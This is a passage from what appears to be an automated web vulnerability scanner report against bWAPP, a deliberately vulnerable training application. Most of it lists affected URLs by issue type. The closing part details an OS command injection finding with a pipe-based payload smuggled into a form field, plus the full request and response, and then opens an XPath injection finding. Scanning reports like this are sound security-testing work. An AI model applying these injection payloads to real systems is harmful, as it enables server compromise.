28.336. http://192.168.52.147/bWAPP/sqli_16.php [name of an arbitrarily supplied URL parameter]

28.337. http://192.168.52.147/bWAPP/sqli_17.php [URL path filename]

28.338. http://192.168.52.147/bWAPP/sqli_17.php [name of an arbitrarily supplied URL parameter]

28.339. http://192.168.52.147/bWAPP/sqli_2.php [URL path filename]

28.340. http://192.168.52.147/bWAPP/sqli_2.php [name of an arbitrarily supplied URL parameter]

28.341. http://192.168.52.147/bWAPP/sqli_3.php [URL path filename]

28.342. http://192.168.52.147/bWAPP/sqli_3.php [name of an arbitrarily supplied URL parameter]

28.343. http://192.168.52.147/bWAPP/sqli_4.php [URL path filename]

28.344. http://192.168.52.147/bWAPP/sqli_4.php [name of an arbitrarily supplied URL parameter]

28.345. http://192.168.52.147/bWAPP/sqli_5.php [URL path filename]

28.346. http://192.168.52.147/bWAPP/sqli_5.php [name of an arbitrarily supplied URL parameter]

28.347. http://192.168.52.147/bWAPP/sqli_6.php [URL path filename]

28.348. http://192.168.52.147/bWAPP/sqli_6.php [name of an arbitrarily supplied URL parameter]

28.349. http://192.168.52.147/bWAPP/sqli_7.php [URL path filename]

28.350. http://192.168.52.147/bWAPP/sqli_7.php [name of an arbitrarily supplied URL parameter]

28.351. http://192.168.52.147/bWAPP/sqli_8-1.php [URL path filename]

28.352. http://192.168.52.147/bWAPP/sqli_8-1.php [name of an arbitrarily supplied URL parameter]

28.353. http://192.168.52.147/bWAPP/sqli_9.php [URL path filename]

28.354. http://192.168.52.147/bWAPP/sqli_9.php [name of an arbitrarily supplied URL parameter]

28.355. http://192.168.52.147/bWAPP/sqli_drupal.php [URL path filename]

28.356. http://192.168.52.147/bWAPP/sqli_drupal.php [name of an arbitrarily supplied URL parameter]

28.357. http://192.168.52.147/bWAPP/ssii.php [URL path filename]

28.358. http://192.168.52.147/bWAPP/ssii.php [name of an arbitrarily supplied URL parameter]

28.359. http://192.168.52.147/bWAPP/ssii.shtml [URL path filename]

28.360. http://192.168.52.147/bWAPP/ssrf.php [URL path filename]

28.361. http://192.168.52.147/bWAPP/ssrf.php [name of an arbitrarily supplied URL parameter]

28.362. http://192.168.52.147/bWAPP/top_security.php [URL path filename]

28.363. http://192.168.52.147/bWAPP/top_security.php [name of an arbitrarily supplied URL parameter]

28.364. http://192.168.52.147/bWAPP/unrestricted_file_upload.php [URL path filename]

28.365. http://192.168.52.147/bWAPP/unrestricted_file_upload.php [name of an arbitrarily supplied URL parameter]

28.366. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php [URL path filename]

28.367. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php [name of an arbitrarily supplied URL parameter]

28.368. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php [URL path filename]

28.369. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php [name of an arbitrarily supplied URL parameter]

28.370. http://192.168.52.147/bWAPP/user_extra.php [URL path filename]

28.371. http://192.168.52.147/bWAPP/user_extra.php [name of an arbitrarily supplied URL parameter]

28.372. http://192.168.52.147/bWAPP/user_new.php [URL path filename]

28.373. http://192.168.52.147/bWAPP/user_new.php [name of an arbitrarily supplied URL parameter]

28.374. http://192.168.52.147/bWAPP/ws_soap.php [URL path filename]

28.375. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

28.376. http://192.168.52.147/bWAPP/xmli_1.php [URL path filename]

28.377. http://192.168.52.147/bWAPP/xmli_1.php [name of an arbitrarily supplied URL parameter]

28.378. http://192.168.52.147/bWAPP/xmli_2.php [URL path filename]

28.379. http://192.168.52.147/bWAPP/xmli_2.php [name of an arbitrarily supplied URL parameter]

28.380. http://192.168.52.147/bWAPP/xss_ajax_1-1.php [URL path filename]

28.381. http://192.168.52.147/bWAPP/xss_ajax_1-1.php [name of an arbitrarily supplied URL parameter]

28.382. http://192.168.52.147/bWAPP/xss_ajax_2-1.php [URL path filename]

28.383. http://192.168.52.147/bWAPP/xss_ajax_2-1.php [name of an arbitrarily supplied URL parameter]

28.384. http://192.168.52.147/bWAPP/xss_back_button.php [URL path filename]

28.385. http://192.168.52.147/bWAPP/xss_back_button.php [name of an arbitrarily supplied URL parameter]

28.386. http://192.168.52.147/bWAPP/xss_custom_header.php [URL path filename]

28.387. http://192.168.52.147/bWAPP/xss_custom_header.php [name of an arbitrarily supplied URL parameter]

28.388. http://192.168.52.147/bWAPP/xss_eval.php [URL path filename]

28.389. http://192.168.52.147/bWAPP/xss_eval.php [name of an arbitrarily supplied URL parameter]

28.390. http://192.168.52.147/bWAPP/xss_get.php [URL path filename]

28.391. http://192.168.52.147/bWAPP/xss_get.php [name of an arbitrarily supplied URL parameter]

28.392. http://192.168.52.147/bWAPP/xss_href-1.php [URL path filename]

28.393. http://192.168.52.147/bWAPP/xss_href-1.php [name of an arbitrarily supplied URL parameter]

28.394. http://192.168.52.147/bWAPP/xss_href-2.php [URL path filename]

28.395. http://192.168.52.147/bWAPP/xss_href-2.php [name of an arbitrarily supplied URL parameter]

28.396. http://192.168.52.147/bWAPP/xss_href-3.php [URL path filename]

28.397. http://192.168.52.147/bWAPP/xss_href-3.php [name of an arbitrarily supplied URL parameter]

28.398. http://192.168.52.147/bWAPP/xss_json.php [URL path filename]

28.399. http://192.168.52.147/bWAPP/xss_json.php [name of an arbitrarily supplied URL parameter]

28.400. http://192.168.52.147/bWAPP/xss_login.php [URL path filename]

28.401. http://192.168.52.147/bWAPP/xss_login.php [name of an arbitrarily supplied URL parameter]

28.402. http://192.168.52.147/bWAPP/xss_php_self.php [URL path filename]

28.403. http://192.168.52.147/bWAPP/xss_php_self.php [name of an arbitrarily supplied URL parameter]

28.404. http://192.168.52.147/bWAPP/xss_phpmyadmin.php [URL path filename]

28.405. http://192.168.52.147/bWAPP/xss_phpmyadmin.php [name of an arbitrarily supplied URL parameter]

28.406. http://192.168.52.147/bWAPP/xss_post.php [URL path filename]

28.407. http://192.168.52.147/bWAPP/xss_post.php [name of an arbitrarily supplied URL parameter]

28.408. http://192.168.52.147/bWAPP/xss_referer.php [URL path filename]

28.409. http://192.168.52.147/bWAPP/xss_referer.php [name of an arbitrarily supplied URL parameter]

28.410. http://192.168.52.147/bWAPP/xss_sqlitemanager.php [URL path filename]

28.411. http://192.168.52.147/bWAPP/xss_sqlitemanager.php [name of an arbitrarily supplied URL parameter]

28.412. http://192.168.52.147/bWAPP/xss_stored_1.php [URL path filename]

28.413. http://192.168.52.147/bWAPP/xss_stored_1.php [name of an arbitrarily supplied URL parameter]

28.414. http://192.168.52.147/bWAPP/xss_stored_2.php [URL path filename]

28.415. http://192.168.52.147/bWAPP/xss_stored_2.php [name of an arbitrarily supplied URL parameter]

28.416. http://192.168.52.147/bWAPP/xss_stored_3.php [URL path filename]

28.417. http://192.168.52.147/bWAPP/xss_stored_3.php [name of an arbitrarily supplied URL parameter]

28.418. http://192.168.52.147/bWAPP/xss_stored_4.php [URL path filename]

28.419. http://192.168.52.147/bWAPP/xss_stored_4.php [name of an arbitrarily supplied URL parameter]

28.420. http://192.168.52.147/bWAPP/xss_user_agent.php [URL path filename]

28.421. http://192.168.52.147/bWAPP/xss_user_agent.php [name of an arbitrarily supplied URL parameter]

28.422. http://192.168.52.147/bWAPP/xxe-1.php [URL path filename]

28.423. http://192.168.52.147/bWAPP/xxe-1.php [name of an arbitrarily supplied URL parameter]

29. Suspicious input transformation (reflected)

30. Cross-domain Referer leakage

30.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

30.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

30.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

30.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

30.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

30.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

30.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

30.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

30.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

30.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

30.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

30.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

30.15. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

30.16. http://192.168.52.147/bWAPP/csrf_2.php

30.17. http://192.168.52.147/bWAPP/directory_traversal_1.php

30.18. http://192.168.52.147/bWAPP/directory_traversal_2.php

30.19. http://192.168.52.147/bWAPP/hpp-2.php

30.20. http://192.168.52.147/bWAPP/hpp-3.php

30.21. http://192.168.52.147/bWAPP/htmli_get.php

30.22. http://192.168.52.147/bWAPP/iframei.php

30.23. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

30.24. http://192.168.52.147/bWAPP/ldap_connect.php

30.25. http://192.168.52.147/bWAPP/phpi.php

30.26. http://192.168.52.147/bWAPP/rlfi.php

30.27. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

30.28. http://192.168.52.147/bWAPP/sqli_1.php

30.29. http://192.168.52.147/bWAPP/sqli_10-1.php

30.30. http://192.168.52.147/bWAPP/sqli_11.php

30.31. http://192.168.52.147/bWAPP/sqli_14.php

30.32. http://192.168.52.147/bWAPP/sqli_15.php

30.33. http://192.168.52.147/bWAPP/sqli_2.php

30.34. http://192.168.52.147/bWAPP/sqli_4.php

30.35. http://192.168.52.147/bWAPP/sqli_5.php

30.36. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

30.37. http://192.168.52.147/bWAPP/xmli_1.php

30.38. http://192.168.52.147/bWAPP/xmli_2.php

30.39. http://192.168.52.147/bWAPP/xss_eval.php

30.40. http://192.168.52.147/bWAPP/xss_get.php

30.41. http://192.168.52.147/bWAPP/xss_href-2.php

30.42. http://192.168.52.147/bWAPP/xss_href-3.php

30.43. http://192.168.52.147/bWAPP/xss_json.php

30.44. http://192.168.52.147/bWAPP/xss_php_self.php

30.45. http://192.168.52.147/bWAPP/xss_stored_2.php

31. File upload functionality

32. Frameable response (potential Clickjacking)

32.1. http://192.168.52.147/bWAPP/admin/

32.2. http://192.168.52.147/bWAPP/admin/index.php

32.3. http://192.168.52.147/bWAPP/admin/phpinfo.php

32.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/

32.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

32.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

32.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

32.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

32.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

32.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

32.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

32.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

32.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

32.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

32.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

32.18. http://192.168.52.147/bWAPP/aim.php

32.19. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

32.20. http://192.168.52.147/bWAPP/ba_forgotten.php

32.21. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

32.22. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

32.23. http://192.168.52.147/bWAPP/ba_weak_pwd.php

32.24. http://192.168.52.147/bWAPP/bof_1.php

32.25. http://192.168.52.147/bWAPP/bof_2.php

32.26. http://192.168.52.147/bWAPP/captcha_box.php

32.27. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

32.28. http://192.168.52.147/bWAPP/clickjacking.php

32.29. http://192.168.52.147/bWAPP/commandi.php

32.30. http://192.168.52.147/bWAPP/commandi_blind.php

32.31. http://192.168.52.147/bWAPP/csrf_2.php

32.32. http://192.168.52.147/bWAPP/csrf_3.php

32.33. http://192.168.52.147/bWAPP/directory_traversal_1.php

32.34. http://192.168.52.147/bWAPP/directory_traversal_2.php

32.35. http://192.168.52.147/bWAPP/fonts/

32.36. http://192.168.52.147/bWAPP/heartbleed.php

32.37. http://192.168.52.147/bWAPP/hostheader_1.php

32.38. http://192.168.52.147/bWAPP/hostheader_2.php

32.39. http://192.168.52.147/bWAPP/hpp-1.php

32.40. http://192.168.52.147/bWAPP/hpp-2.php

32.41. http://192.168.52.147/bWAPP/hpp-3.php

32.42. http://192.168.52.147/bWAPP/htmli_current_url.php

32.43. http://192.168.52.147/bWAPP/htmli_get.php

32.44. http://192.168.52.147/bWAPP/htmli_post.php

32.45. http://192.168.52.147/bWAPP/htmli_stored.php

32.46. http://192.168.52.147/bWAPP/http_response_splitting.php

32.47. http://192.168.52.147/bWAPP/http_verb_tampering.php

32.48. http://192.168.52.147/bWAPP/iframei.php

32.49. http://192.168.52.147/bWAPP/images/

32.50. http://192.168.52.147/bWAPP/info.php

32.51. http://192.168.52.147/bWAPP/information_disclosure_1.php

32.52. http://192.168.52.147/bWAPP/information_disclosure_2.php

32.53. http://192.168.52.147/bWAPP/information_disclosure_3.php

32.54. http://192.168.52.147/bWAPP/information_disclosure_4.php

32.55. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

32.56. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

32.57. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

32.58. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

32.59. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

32.60. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

32.61. http://192.168.52.147/bWAPP/insecure_iframe.php

32.62. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

32.63. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

32.64. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

32.65. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

32.66. http://192.168.52.147/bWAPP/js/

32.67. http://192.168.52.147/bWAPP/ldap_connect.php

32.68. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

32.69. http://192.168.52.147/bWAPP/login.php

32.70. http://192.168.52.147/bWAPP/logs/

32.71. http://192.168.52.147/bWAPP/maili.php

32.72. http://192.168.52.147/bWAPP/manual_interv.php

32.73. http://192.168.52.147/bWAPP/password_change.php

32.74. http://192.168.52.147/bWAPP/passwords/

32.75. http://192.168.52.147/bWAPP/php_cgi.php

32.76. http://192.168.52.147/bWAPP/php_eval.php

32.77. http://192.168.52.147/bWAPP/phpi.php

32.78. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

32.79. http://192.168.52.147/bWAPP/portal.php

32.80. http://192.168.52.147/bWAPP/restrict_device_access.php

32.81. http://192.168.52.147/bWAPP/restrict_folder_access.php

32.82. http://192.168.52.147/bWAPP/rlfi.php

32.83. http://192.168.52.147/bWAPP/secret_html.php

32.84. http://192.168.52.147/bWAPP/security_level_set.php

32.85. http://192.168.52.147/bWAPP/shellshock.php

32.86. http://192.168.52.147/bWAPP/sm_cors.php

32.87. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

32.88. http://192.168.52.147/bWAPP/sm_dos_1.php

32.89. http://192.168.52.147/bWAPP/sm_dos_3.php

32.90. http://192.168.52.147/bWAPP/sm_dos_4.php

32.91. http://192.168.52.147/bWAPP/sm_ftp.php

32.92. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

32.93. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

32.94. http://192.168.52.147/bWAPP/sm_mitm_1.php

32.95. http://192.168.52.147/bWAPP/sm_mitm_2.php

32.96. http://192.168.52.147/bWAPP/sm_robots.php

32.97. http://192.168.52.147/bWAPP/sm_samba.php

32.98. http://192.168.52.147/bWAPP/sm_snmp.php

32.99. http://192.168.52.147/bWAPP/sm_webdav.php

32.100. http://192.168.52.147/bWAPP/sm_xst.php

32.101. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

32.102. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

32.103. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

32.104. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

32.105. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

32.106. http://192.168.52.147/bWAPP/sqli_1.php

32.107. http://192.168.52.147/bWAPP/sqli_10-1.php

32.108. http://192.168.52.147/bWAPP/sqli_11.php

32.109. http://192.168.52.147/bWAPP/sqli_12.php

32.110. http://192.168.52.147/bWAPP/sqli_13.php

32.111. http://192.168.52.147/bWAPP/sqli_14.php

32.112. http://192.168.52.147/bWAPP/sqli_15.php

32.113. http://192.168.52.147/bWAPP/sqli_16.php

32.114. http://192.168.52.147/bWAPP/sqli_17.php

32.115. http://192.168.52.147/bWAPP/sqli_2.php

32.116. http://192.168.52.147/bWAPP/sqli_3.php

32.117. http://192.168.52.147/bWAPP/sqli_4.php

32.118. http://192.168.52.147/bWAPP/sqli_5.php

32.119. http://192.168.52.147/bWAPP/sqli_6.php

32.120. http://192.168.52.147/bWAPP/sqli_7.php

32.121. http://192.168.52.147/bWAPP/sqli_8-1.php

32.122. http://192.168.52.147/bWAPP/sqli_9.php

32.123. http://192.168.52.147/bWAPP/sqli_drupal.php

32.124. http://192.168.52.147/bWAPP/ssii.php

32.125. http://192.168.52.147/bWAPP/ssrf.php

32.126. http://192.168.52.147/bWAPP/stylesheets/

32.127. http://192.168.52.147/bWAPP/top_security.php

32.128. http://192.168.52.147/bWAPP/training.php

32.129. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

32.130. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

32.131. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

32.132. http://192.168.52.147/bWAPP/user_extra.php

32.133. http://192.168.52.147/bWAPP/user_new.php

32.134. http://192.168.52.147/bWAPP/ws_soap.php

32.135. http://192.168.52.147/bWAPP/xmli_1.php

32.136. http://192.168.52.147/bWAPP/xmli_2.php

32.137. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

32.138. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

32.139. http://192.168.52.147/bWAPP/xss_back_button.php

32.140. http://192.168.52.147/bWAPP/xss_custom_header.php

32.141. http://192.168.52.147/bWAPP/xss_eval.php

32.142. http://192.168.52.147/bWAPP/xss_get.php

32.143. http://192.168.52.147/bWAPP/xss_href-1.php

32.144. http://192.168.52.147/bWAPP/xss_href-2.php

32.145. http://192.168.52.147/bWAPP/xss_href-3.php

32.146. http://192.168.52.147/bWAPP/xss_json.php

32.147. http://192.168.52.147/bWAPP/xss_login.php

32.148. http://192.168.52.147/bWAPP/xss_php_self.php

32.149. http://192.168.52.147/bWAPP/xss_phpmyadmin.php

32.150. http://192.168.52.147/bWAPP/xss_post.php

32.151. http://192.168.52.147/bWAPP/xss_referer.php

32.152. http://192.168.52.147/bWAPP/xss_sqlitemanager.php

32.153. http://192.168.52.147/bWAPP/xss_stored_1.php

32.154. http://192.168.52.147/bWAPP/xss_stored_2.php

32.155. http://192.168.52.147/bWAPP/xss_stored_3.php

32.156. http://192.168.52.147/bWAPP/xss_stored_4.php

32.157. http://192.168.52.147/bWAPP/xss_user_agent.php

32.158. http://192.168.52.147/bWAPP/xxe-1.php

33. Link manipulation (reflected)

34. Directory listing

34.1. http://192.168.52.147/bWAPP/fonts/

34.2. http://192.168.52.147/bWAPP/images/

34.3. http://192.168.52.147/bWAPP/js/

34.4. http://192.168.52.147/bWAPP/logs/

34.5. http://192.168.52.147/bWAPP/passwords/

34.6. http://192.168.52.147/bWAPP/stylesheets/

35. Private IP addresses disclosed

35.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

35.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

35.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

35.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

35.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

35.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

35.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

35.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

35.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

35.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

35.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

35.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

35.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

35.16. http://192.168.52.147/bWAPP/aim.php

35.17. http://192.168.52.147/bWAPP/commandi.php

35.18. http://192.168.52.147/bWAPP/logs/visitors.txt

35.19. http://192.168.52.147/bWAPP/sqli_17.php

35.20. http://192.168.52.147/bWAPP/ssii.shtml

35.21. http://192.168.52.147/bWAPP/xss_stored_4.php

36. HTML does not specify charset

36.1. http://192.168.52.147/bWAPP/admin/phpinfo.php

36.2. http://192.168.52.147/bWAPP/admin/phpinfo.php/

36.3. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

36.4. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

36.5. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

36.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

36.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

36.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

36.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

36.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

36.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

36.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

36.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

36.16. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

36.17. http://192.168.52.147/bWAPP/ssii.shtml

36.18. http://192.168.52.147/bWAPP/ws_soap.php

37. [Vulners] Software detected

37.1. http://192.168.52.147/bWAPP/clickjacking.php

37.2. http://192.168.52.147/bWAPP/clickjacking.php

37.3. http://192.168.52.147/bWAPP/clickjacking.php

37.4. http://192.168.52.147/bWAPP/commandi.php

37.5. http://192.168.52.147/bWAPP/commandi.php

37.6. http://192.168.52.147/bWAPP/commandi.php

37.7. http://192.168.52.147/bWAPP/commandi.php

37.8. http://192.168.52.147/bWAPP/xss_eval.php


1. OS command injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The target parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload |echo 8v6rl9owbr yc6oeo2h54||a #' |echo 8v6rl9owbr yc6oeo2h54||a #|" |echo 8v6rl9owbr yc6oeo2h54||a # was submitted in the target parameter. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

Request

POST /bWAPP/commandi.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/commandi.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 30
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
Connection: close

target=www.nsa.gov%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23'%20%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23%7c%22%20%7cecho%208v6rl9owbr%20yc6oeo2h54%7c%7ca%20%23&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 04:04:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12969

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<p align="left">8v6rl9owbr yc6oeo2h54
</p>
...[SNIP]...
2. XPath injection

There are 152 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.


2.1. http://192.168.52.147/bWAPP/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:03:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

